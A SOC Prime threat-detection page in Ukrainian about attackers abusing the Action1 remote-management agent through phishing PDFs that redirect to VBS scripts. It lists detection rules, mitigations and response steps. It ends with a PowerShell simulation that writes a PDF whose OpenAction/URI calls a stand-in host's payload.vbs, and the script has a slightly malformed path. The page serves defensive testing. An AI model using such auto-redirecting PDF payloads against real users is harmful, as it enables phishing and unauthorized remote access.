SOC Prime Bias: High

06 Oct 2026 14:36 UTC

Зловживання інструментами RMM продовжує зростати у активних загрозах

Author Photo
SOC Prime Team linkedin icon Стежити
Зловживання інструментами RMM продовжує зростати у активних загрозах
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисники використовують інструменти віддаленого управління та моніторингу (RMM), зокрема Action1, для встановлення стійкого доступу в скомпрометованих середовищах. Атака починається з фішингового електронного листа, що містить шкідливий PDF, який перенаправляє жертв на файл VBS. Сценарій потім завантажує та встановлює пакет MSI, що містить легітимного агента Action1, що дозволяє несанкціонований віддалений доступ.

Розслідування

Розслідування виявило шкідливий PDF, який використовує ключові слова OpenAction та URI для ініціювання завантаження з URL, розміщеного на Vercel. Аналіз отриманого пакета MSI виявив, що легітимні файли компанії Action1 використовуються зловмисно через хмарну інфраструктуру самого постачальника. Встановлений агент містить специфічний CustomerID та спілкується з легітимним доменом Action1.

Міри захисту

Організації повинні налаштувати фільтрацію електронної пошти для виявлення підозрілих структур PDF, що містять ключові слова OpenAction або URI. Команди безпеки повинні стежити за несанкціонованими інсталяціями RMM-інструментів та створенням служби A1Agent. Блокування з’єднань з несподіваною хмарною інфраструктурою RMM та виявлення незвичних або несанкціонованих CustomerID може додатково знизити ризик зловживання віддаленим доступом.

Відповідь

Коли виявлено шкідливу активність RMM, ізолюйте уражений хост, щоб запобігти додатковому виконанню віддалених команд. Розслідуйте фішинговий електронний лист та проведіть судову експертизу пов’язаних файлів VBS та MSI. Відкликайте потенційно скомпрометовані облікові дані та перегляньте конфігурації агентів Action1 на предмет індикаторів несанкціонованого віддаленого доступу або стійкості.

Хід атаки

Ми ще оновлюємо цю частину.

Виявлення

LOLBAS WScript / CScript (через process_creation)

Команда SOC Prime
06 Жов 2026

Альтернативне програмне забезпечення для віддаленого доступу / управління (через process_creation)

Команда SOC Prime
06 Жов 2026

Можлива крадіжка/експіляція даних / C2 через сторонні сервіси / інструменти (через проксі)

Команда SOC Prime
06 Жов 2026

Можлива крадіжка/експіляція даних / C2 через сторонні сервіси / інструменти (через dns)

Команда SOC Prime
06 Жов 2026

Можлива активність управління та контролю через спробу комунікації з доменом програмного забезпечення для віддаленого доступу (через dns)

Команда SOC Prime
06 Жов 2026

IOC (HashSha256) для виявлення: Інші інструменти RMM у дикій природі

Правила SOC Prime AI
06 Жов 2026

Віддалене підключення до корпоративних серверів Action1 [Підключення до мережі Windows]

Правила SOC Prime AI
06 Жов 2026

PDF OpenAction та URI перенаправлення до шкідливого VBS [Подія файлу Windows]

Правила SOC Prime AI
06 Жов 2026

Виконання симуляції

  • Сценарій атаки та команди: Противник імітує фішингову кампанію. Мета полягає в тому, щоб доставити файл з назвою Квитанція про транзакцію .pdf жертві. PDF спеціально розроблений так, щоб як тільки користувач відкриє його, /OpenAction команда запускає /URI перенаправлення. Це перенаправлення призначено для перенесення користувача на сайт, що служить шкідливим VBScript. Щоб запустити зазначене правило виявлення, ми створимо файл з точною назвою та внутрішніми рядками, необхiдними.

  • Скрипт тестування регресії:

    # Скрипт симуляції: Активізація виявлення PDF OpenAction
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    
    # Створення "шкідливого" вмісту PDF для відповідності ключовим словам виявлення
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Запис файлу на диск для запуску виявлення 'file_event'
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Файл для симуляції створено в: $targetFile"
    Write-Host "Перевірте вашу SIEM на отримання сповіщення про виявлення."
  • Команди очищення:

    # Очищення: Видалення симульованого шкідливого файлу
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Очистка завершена: $targetFile видалено."
    } else {
        Write-Host "Очистка: Файл не знайдено."